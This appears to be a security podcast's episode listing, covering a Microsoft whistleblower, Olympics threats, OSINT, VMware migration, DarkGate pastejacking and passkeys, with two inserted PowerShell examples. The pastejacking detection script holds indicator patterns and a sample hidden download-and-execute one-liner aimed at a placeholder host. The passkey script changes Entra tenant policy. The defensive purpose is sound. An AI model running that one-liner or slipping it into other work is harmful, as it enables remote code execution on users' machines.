The Security Swarm Podcast

Welcome to The Security Swarm Podcast – a weekly conversation of the most critical issues facing the world of cybersecurity today, hosted by Andy Syrewicze, Security Evangelist at Hornetsecurity. From the malicious use of AI tools to social engineering scams, each episode hones in on a pertinent topic dissected by an industry expert and backed up by real-world data direct from our Security Lab.

The world of cybersecurity should not be taken on alone – it’s time to join the swarm.

Microsoft’s Security Saga Continues: Insights from Whistleblower

In this episode, Andy sits down once again with Paul to continue their conversation about Microsoft’s struggles with security. The episode focuses on a recent report from ProPublica about a Microsoft whistleblower named Andrew Harris. The report alleges that Microsoft was aware of a serious vulnerability in its on-premises Active Directory Federation Services (ADFS) software that could have enabled the SolarWinds supply chain attack, but chose not to fix it or disclose it to customers.

Andy and Paul discuss how Microsoft’s focus on new features and cloud growth over security, as well as the desire to win lucrative government contracts, may have contributed to this decision. They also touch on the challenges faced by Microsoft’s security response team and the broader issue of security being seen as a cost center rather than a profit driver.

Key Takeaways:

  • Microsoft ignored a serious ADFS vulnerability that could have enabled widespread attacks.
  • Security is often viewed as a cost center at Microsoft, rather than a profit driver. This mindset led to the ADFS vulnerability being ignored, as fixing it was not seen as a priority compared to delivering new features and products.
  • Microsoft was criticized for not being transparent about the ADFS vulnerability and not giving customers the option to implement mitigations, even if it meant sacrificing some functionality.
  • The ADFS incident is symptomatic of broader security culture problems at Microsoft, where security is not always prioritized, and technical debt or legacy systems are not adequately addressed.

Timestamps:

(02:22) – Explaining the Whistleblower’s Allegations and the SolarWinds Attack

(07:32) – Vulnerability in ADFS and Microsoft’s “Security Boundaries” Argument

(13:06) – Why Was the Issue Swept Under the Rug?

(19:16) – The Challenges Faced by the Microsoft Security Response Center (MSRC)

(26:24) – Satya Nadella’s Comments on Prioritizing Security over New Features

(27:38) – The Controversy Around the “Recall” Feature in Windows 11

Episode Resources:

ProPublica Article

Summer Olympics 2024: How and Why Threat Actors Target the Games

In this episode of the Security Swarm podcast, host Andy is joined by Romain Basset from Hornetsecurity to discuss the cybersecurity implications of the upcoming 2024 Olympic Games in Paris, France. The conversation explores how the geopolitical landscape, with ongoing global tensions and conflicts, creates a high-profile stage that threat actors may target for hacktivism, financial gain, or destabilization.

Throughout the episode, they highlight the increased risks leading up to the 2024 Games, noting that French infrastructure has already been targeted by various threat actor groups, including with DDoS attacks. They discuss the blurring lines between cybercrime and geopolitical threats, with many threat actors now engaging in both financially and politically motivated attacks.

Key takeaways:

  • The Olympics are a prime target for cyber-attacks due to the global attention and geopolitical tensions surrounding the event.
  • Past Olympic games have seen a variety of cyber-attacks, including distributed denial-of-service (DDoS) attacks, malware, and false flag operations to mislead attribution.
  • Cyber-attacks targeting the Olympics can have far-reaching consequences, including international chaos, disinformation campaigns, and real-world impacts on businesses and infrastructure.
  • While the threat landscape is complex, the best defense is to focus on cybersecurity basics like user training, multi-factor authentication, and regular backups – rather than getting distracted by the latest “shiny object” threat.

Timestamps:

(01:15) – Why Cybersecurity is Important for the Olympics

(02:25) – Geopolitical Tensions and Threat Actors

(04:31) – Potential Cyber Attacks – Scams, Extortion, Disinformation

(06:50) – The 2018 Pyeongchang Olympics Cyber Attack

(12:48) – False Flags and Attribution Challenges

(16:05) – Overlap Between Cybercrime and Geopolitical Destabilization

(19:13) – Real-World Impacts of Geopolitical Cyber Tensions

(23:08) – Cybersecurity Best Practices and Advice

Episode Resources:

Read our blog about Russia’s notorious history of attacking the Olympics

Protect your business before it’s too late with 365 Total Protection

Train your users to spot phishing emails during the Olympics with Security Awareness Service

Celebrating 50 Episodes: A Review of our Top Security Discussions (PT2)

For our 50th episode of the Security Swarm Podcast, Andy and Eric Siron look back at the last 49 episodes of the show. They go through some core security topics and discuss whether they’re still relevant, how they’ve changed in comparison to the evolving threat landscape and provide updates on some of the major stories discussed. 

This is part 2 of a 2-part episode.

Celebrating 50 Episodes: A Review of our Top Security Discussions (PT1)

For our 50th episode of the Security Swarm Podcast, Andy and Eric Siron look back at the last 49 episodes of the show. They go through some core security topics and discuss whether they’re still relevant, how they’ve changed in comparison to the evolving threat landscape and provide updates on some of the major stories discussed.

This is part 1 of a 2-part episode, with part 2 coming next week.

Key Takeaways:

  • AI-powered tools are a double-edged sword, capable of both beneficial and malicious applications.
  • Botnets and malware continue to be a persistent threat, as attackers adapt and find new ways to circumvent disruptions.
  • Email-based social engineering remains a significant vulnerability, as human nature makes it a difficult problem to solve.
  • Immutability and backups are critical for protecting against ransomware and data loss.
  • Securing cloud-based platforms like Microsoft 365 requires a nuanced approach, as the responsibility is shared between the provider and the customer.
  • Security awareness training can be challenging to implement effectively, requiring a balance between engagement and cost.
  • Navigating the relationship between IT administrators and CISOs is crucial for effective security management.

Timestamps:

(00:31) Using ChatGPT to create ransomware – still a relevant and evolving topic

(02:22) How tech pros should handle security news and zero-days

(09:09) The re-emergence of Emotet and the challenges of disrupting botnets

(12:04) The persistent problem of social engineering and email attacks

(13:25) The importance of immutability and backups against ransomware

(16:29) The security of Microsoft 365

(19:35) Deep dive on the QakBot malware

(20:20) The necessity of advanced threat protection (ATP)

(22:58) Guidance on effective security awareness training

(25:41) Tips for IT admins on working with CISOs

(26:07) Microsoft’s throttling of legacy on-premises Exchange servers

(28:11) Discussing Episodes 12 and 13, recorded live at InfoSecurity Europe, on compliance and security horror stories

OSINT in The Hands of Hackers

In this episode of the Security Swarm Podcast, host Andy is joined by Romain Basset, the Director of Technology Strategy at Hornetsecurity. They’re exploring the topic of Open-Source Intelligence (OSINT) – what it is, how threat actors use it to launch effective attacks, and the dangers it poses.

Throughout the episode, they discuss the ease with which OSINT can gather information using AI and other tools and provide examples of how it can be used in phishing, business email compromise, and even deep fake attacks. The conversation also touches on the importance of privacy awareness and security awareness training to mitigate these threats.

Key Takeaways:

  • OSINT refers to publicly available information that threat actors can easily gather to launch targeted attacks. This includes social media profiles, online forums, data breach databases, and more.
  • Threat actors are using OSINT to not only target individuals, but also find vulnerabilities in organizations’ web-facing software and infrastructure.
  • Combating OSINT-powered attacks requires a multi-pronged approach of improving privacy awareness and implementing robust security awareness training programs.

Timestamps:

(02:24) – Definition of OSINT

(07:17) – How AI makes OSINT-powered attacks easier

(15:22) – Using OSINT to target organizations

(25:35) – Mitigating OSINT-powered attacks

Episode Resources:

Train your users with a personalised Security Awareness Service

Business Email Compromise: The $43 Billion Scam

The Security Implications of Migrating from VMware

In this episode of the Security Swarm Podcast, host Andy and recurring guest, Paul, talk about the challenges and opportunities organizations face amidst the Broadcom acquisition of VMware. They discuss the steep price hikes for VMware licenses and the security vulnerabilities recently discovered in VMware products.

This acquisition has prompted many businesses to consider alternative solutions, and the episode provides an overview of the available options within the Microsoft ecosystem: Azure, Azure Stack HCI, and on-premises Hyper-V. Andy and Paul offer insights into ensuring a secure and seamless transition away from VMware, making this episode essential listening for IT professionals navigating these changes.

Key takeaways:

  • Broadcom’s acquisition of VMware is causing major disruption, with license cost increases of 300-500% for many organizations.
  • Microsoft Hyper-V is a viable alternative to VMware: a mature, enterprise-ready hypervisor that can be a cost-effective replacement.
  • Azure Stack HCI provides an on-premises VMware alternative: a hyperconverged infrastructure solution with Hyper-V at the core, plus integration with Azure services for management and modernization.
  • Security pitfalls can arise when organizations rush to migrate away from VMware due to the Broadcom situation. Proper planning, understanding the security posture of the new platform, and ensuring critical configurations like backup are in place are essential to mitigate risks.

Timestamps:

(02:51) – Vulnerabilities in VMware

(07:30) – Migrating to the Microsoft Ecosystem

(13:38) – On-Premises Microsoft Options

(38:45) – Security Considerations for Migrations

(44:52) – Pragmatic Approach to Platform Selection

Episode Resources:

Microsoft and Broadcom to Support License Portability

Paul’s article on options for migrating from VMware to Microsoft 

VMware Sandbox Escape Bugs

New Threat Campaign Distributing DarkGate Malware & The Massive 911 S5 Botnet Takedown

In this episode of the Security Swarm Podcast, host Andy and recurring guest Eric Siron discuss the Monthly Threat Report for June 2024. They explore a new threat campaign distributing the DarkGate malware using a technique called pastejacking, in which a web page tricks the victim into copying an attacker-supplied command and pasting it into a console or dialog. Additionally, they touch upon the 911 S5 proxy botnet takedown and how threat actors are exploiting Stack Overflow to distribute malware.

Key takeaways:

  • Awareness of common tactics like pastejacking can help prevent falling victim to malware campaigns.
  • Read the details of the DarkGate attack methods we show in the report and adjust your security posture as needed. If you’re in need of powerful, next-gen email security software, we’ve got you covered.
  • If your organization is leveraging software from any online, public repository, take the time to review that repository and do a risk assessment. Threat-actors are increasingly using public software repos for malicious purposes.
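As an added example, not code from the episode or from Hornetsecurity: pastejacking lures typically tell the victim to paste the attacker's command into the Windows Run dialog (Win+R) or a PowerShell window; that is the common pattern behind such campaigns, not something the episode summary states. Windows records Run dialog history per user in the RunMRU registry key, so a quick after-the-fact check on a suspect machine is to list that history and flag entries that look like a download-and-execute one-liner. The sample entries at the bottom are constructed for illustration.

```powershell
# Added example: inspect Run-dialog history for pasted download-and-execute commands.
function Get-SuspiciousRunHistory {
    param(
        # Per-user Run dialog history (a real Windows artifact). Values are named a, b, c, ...
        # and 'MRUList' gives the most-recent-first order; each value ends in a literal "\1".
        [string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU',
        # Optional: pass entries directly (e.g. exported from another host) instead of reading the registry.
        [string[]]$Entries
    )
    if (-not $Entries) {
        if (-not (Test-Path $Path)) { return @() }
        $key   = Get-ItemProperty -Path $Path
        $order = ([string]$key.MRUList).ToCharArray()
        $Entries = foreach ($c in $order) { $key.("$c") }
    }

    # Indicators typical of a pasted one-liner: an interpreter or LOLBin, a hidden/encoded
    # flag, in-memory execution, and a remote URL. Two or more together is worth a look.
    $patterns = @(
        'powershell(\.exe)?\s', '\bpwsh\b', 'mshta', 'cmd(\.exe)?\s*/c', '\bcurl\s', 'certutil', 'bitsadmin',
        '-e(nc|ncodedcommand)?\s', '-w(indowstyle)?\s*hidden', '\biex\b', 'invoke-expression',
        'downloadstring', 'frombase64string', 'https?://'
    )

    foreach ($raw in $Entries) {
        if (-not $raw) { continue }
        $cmd  = $raw -replace '\\1$', ''          # strip the trailing "\1" RunMRU appends
        $hits = @($patterns | Where-Object { $cmd -match $_ })   # -match is case-insensitive
        if ($hits.Count -ge 2) {
            [pscustomobject]@{ Command = $cmd; Indicators = ($hits -join ', ') }
        }
    }
}

# Constructed sample entries (not real telemetry): the first is benign, the second is the
# shape of a pasted lure and is reported with four matching indicators.
$sample = @(
    'notepad\1',
    'powershell -w hidden -c "iex (iwr https://example.invalid/x)"\1'
)
Get-SuspiciousRunHistory -Entries $sample | Format-List

# Live check on the current user of this machine:
# Get-SuspiciousRunHistory | Format-List
```

RunMRU only captures what went through the Run dialog. If the lure told the user to paste into a PowerShell window instead, check the PSReadLine history file (`$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`) and process-creation telemetry for powershell.exe or mshta.exe spawned by explorer.exe with the same indicators.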

Timestamps:

(03:15) – Insights into Email Threat Trends and Industry Targeting in Cybersecurity Landscape

(13:15) – Unveiling New Cybersecurity Threat Campaign using Pastejacking

(23:31) – Massive Botnet Take Down and Arrest of Operator: A Victory Against Cybercrime

(29:29) – Beware of Malicious Packages: A Cautionary Case Study from Stack Overflow

Episode Resources:

Full Monthly Threat Report

Enhance Security Awareness by Training Employees

Windows Server 2025: New Security Features Revealed

In this podcast episode, Andy and Paul discuss the upcoming release of Windows Server 2025 and the many security enhancements it will bring. They cover improvements to Active Directory, delegated Managed Service Accounts (dMSA), Kerberos protocol enhancements, SMB enhancements, hot patching, ReFS improvements, confidential computing, and Extended Security Updates.

Key takeaways: 

  • Windows Server 2025 brings a host of security enhancements. 
  • The release date of Windows Server 2025 is speculated to be in September 2024, coinciding with the release of System Center 2025. 

Timestamps: 

(07:05) – Enhancements in Active Directory Security and NUMA Support: A Deep Dive

(13:19) – Revolutionizing Service Accounts: Delegated Managed Service Accounts Explained

(20:28) – Revamping Windows Server Security: Say Goodbye to NTLM and Hello to Kerberos

(28:15) – Revolutionizing SMB with SMB over QUIC and Hot Patching in Windows Server 2025

(32:34) – Revolutionizing Patching with Hot Patching in Windows Server and Azure

(36:02) – Revolutionizing Data Protection with Resilient File System (ReFS) and Confidential Computing

(39:34) – Exploring Confidential Compute, Server Upgrades, and Extended Security Updates in Windows Server Environment

(42:37) – Windows Server 2025 Release Date Speculations and Future Episode Teasers

Episode Resources: 

What’s new in Windows Server 2025 from MS Learn

Passkeys in Microsoft Entra: Benefits, Implementation Tips & More

In this episode of the Security Swarm Podcast, our host Andy and guest speaker Jan Bakker discuss passkeys in the Microsoft ecosystem. They cover topics such as the definition of passkeys, prerequisites, tips for implementation, and the user experience. They also highlight the user-centric enrollment process, the role of conditional access, and the potential challenges and advantages of transitioning to passkeys. 

Key takeaways: 

  • Passkeys are a new authentication mechanism built on the FIDO2/WebAuthn standards, providing a secure and user-friendly passwordless experience.
  • Device-bound passkeys are more secure but not transferable between devices, while syncable passkeys offer convenience but may introduce potential security risks. 
  • Passkeys enhance security by being phishing-resistant and replacing traditional passwords and MFA methods. 
  • The enrollment process involves using the Microsoft Authenticator app and ensuring prerequisites like device compatibility and Bluetooth connectivity. 
  • Admins can enforce authentication method policies and conditional access to control user access and enhance security. 
  • User education, interface improvements, and conditional access play crucial roles in a successful transition to passkeys. 
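As an added, worked example that is not code from the episode or from Hornetsecurity: the following PowerShell script uses the Microsoft Graph PowerShell SDK (Microsoft.Graph.Authentication) to enable passkeys (the Fido2 authentication method) for a pilot group, restrict registration to the authenticator models you choose, and require phishing-resistant MFA through a report-only Conditional Access policy. The group object ID and the AAGUID list are placeholders you must fill in; the endpoints, property names and cmdlets are the documented Graph v1.0 ones.

```powershell
#Requires -Modules Microsoft.Graph.Authentication
# Added example, not the episode's or Hornetsecurity's code. Placeholders (assumptions) below
# must be replaced: the pilot group's object ID and the AAGUIDs of the authenticators you allow.
$PilotGroupId   = '<object-id-of-passkey-pilot-group>'
$AllowedAaguids = @('<aaguid-of-allowed-authenticator>')
$Graph          = 'https://graph.microsoft.com/v1.0'

# Refuse to run with placeholder AAGUIDs; Graph would reject them anyway, but fail early and clearly.
foreach ($g in $AllowedAaguids) {
    $parsed = [guid]::Empty
    if (-not [guid]::TryParse($g, [ref]$parsed)) { throw "Replace placeholder AAGUID '$g' with a real value." }
}

Connect-MgGraph -Scopes 'Policy.ReadWrite.AuthenticationMethod', 'Policy.ReadWrite.ConditionalAccess'
$fido2Uri = "$Graph/policies/authenticationMethodsPolicy/authenticationMethodConfigurations/Fido2"

# 1. Current state of the FIDO2 (passkey) authentication method.
$before = Invoke-MgGraphRequest -Method GET -Uri $fido2Uri
Write-Host "FIDO2 method state before: $($before.state)"

# 2. Enable passkeys for the pilot group with self-service registration. The AAGUID identifies the
#    authenticator model, so an allow list is where you decide which device-bound or syncable
#    providers users may enrol; any other authenticator is rejected at registration time.
$fido2Body = @{
    '@odata.type'                    = '#microsoft.graph.fido2AuthenticationMethodConfiguration'
    state                            = 'enabled'
    isSelfServiceRegistrationEnabled = $true
    isAttestationEnforced            = $false   # set $true only if every allowed authenticator can attest
    keyRestrictions                  = @{
        isEnforced      = $true
        enforcementType = 'allow'
        aaGuids         = $AllowedAaguids
    }
    includeTargets = @(
        @{ targetType = 'group'; id = $PilotGroupId; isRegistrationRequired = $false }
    )
}
Invoke-MgGraphRequest -Method PATCH -Uri $fido2Uri -Body $fido2Body | Out-Null

# 3. Read it back and catch the classic misconfiguration: an enforced allow list with no AAGUIDs
#    silently blocks every passkey registration.
$after = Invoke-MgGraphRequest -Method GET -Uri $fido2Uri
$kr = $after.keyRestrictions
if ($kr -and $kr.isEnforced -and $kr.enforcementType -eq 'allow' -and -not $kr.aaGuids) {
    Write-Warning 'Key restrictions allow-list is empty: all passkey registrations will fail.'
}
Write-Host "FIDO2 method state after: $($after.state)"

# 4. Conditional Access: require the built-in "Phishing-resistant MFA" authentication strength for
#    the pilot group, in report-only mode first so sign-in logs show who would have been blocked.
$strength = (Invoke-MgGraphRequest -Method GET -Uri "$Graph/policies/authenticationStrengthPolicies").value |
    Where-Object { $_.displayName -eq 'Phishing-resistant MFA' }
if (-not $strength) { throw 'Built-in "Phishing-resistant MFA" authentication strength not found.' }

$caBody = @{
    displayName   = 'Pilot: require phishing-resistant MFA (report-only)'
    state         = 'enabledForReportingButNotEnforced'
    conditions    = @{
        users          = @{ includeGroups = @($PilotGroupId) }
        applications   = @{ includeApplications = @('All') }
        clientAppTypes = @('all')
    }
    grantControls = @{
        operator               = 'OR'
        authenticationStrength = @{ id = $strength.id }
    }
}
$policy = Invoke-MgGraphRequest -Method POST -Uri "$Graph/identity/conditionalAccess/policies" -Body $caBody
Write-Host "Created CA policy '$($policy.displayName)' in state $($policy.state)"
```

Run the Conditional Access policy in report-only mode until the pilot group has registered; switching it to enabled before registration is complete locks those users out. The AAGUID allow list is also how you express the device-bound versus syncable decision from the episode: only the authenticator models on the list can be enrolled, so leave syncable providers off it if you do not want credentials that follow a user's cloud account.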

Timestamps: 

(03:04) – Unlocking the Future of Passkeys and the Evolution of Authentication 

(06:18) – Exploring the Security Benefits of Device Bound and Syncable Passkeys 

(14:54) – How to Prepare for Passkeys in Microsoft 365 

(23:03) – Navigating the Rollout of Passkeys for Enhanced Security: Admins vs End Users 

(29:03) – Maximizing Security with Passkeys, Conditional Access, and Authentication Policies 

(33:01) – Unveiling the Convenience of Device-Bound Passkeys in Vasquez for Microsoft 365 

Episode Resources: 

Previous episode on Passkeys

Blog post of Jan

Did the CSRB Force Microsoft’s Hand on Security?

Microsoft has recently been criticized for not prioritizing security enough. Following the CSRB’s report on the Storm-0558 attack, Microsoft announced that security is now its top priority, with a commitment to address security issues before new product innovations. In this podcast episode, Andy and Paul Schnackenburg discuss Charlie Bell’s blog post on the progress of the Secure Future Initiative (SFI).

The conversation brings up the burning question: Was it the Cyber Safety Review Board (CSRB) that catalyzed Microsoft’s proactive stance on security? 

Key takeaways: 

  • Microsoft is taking proactive steps to address security vulnerabilities and enhance its security measures following recent incidents. 
  • The focus on protecting identities, enforcing multi-factor authentication, and improving network segmentation are crucial for bolstering security. 
  • Efforts to align security actions with recommendations from the CSRB demonstrate a commitment to addressing criticisms directly. 

Timestamps:

(06:52) – Key Insights from Charlie Bell’s Blog Post Addressing Cyber Security Concerns

(11:22) – Enhancing Security Measures in Response to the CSRB’s Report

(21:22) – Top Security Practices for Protecting Tenants and Production Systems

(24:46) – Enhancing Cloud Security with Micro Segmentation and Software Supply Chain Protection

(30:44) – Challenges and Considerations in Cloud Security Logging and Storage

(34:37) – Enhancing Cloud Security with Microsoft Sentinel and Vulnerability Reporting

(37:37) – Unveiling Common Vulnerabilities and the Importance of Secure Authentication in Cloud Environments

(42:34) – Analyzing Microsoft’s Response to a Security Incident

Episode Resources:

The Blog Post from Charlie Bell

EP39: Are Passkeys the Future of Authentication?

Subscribe to our new YouTube channel for more.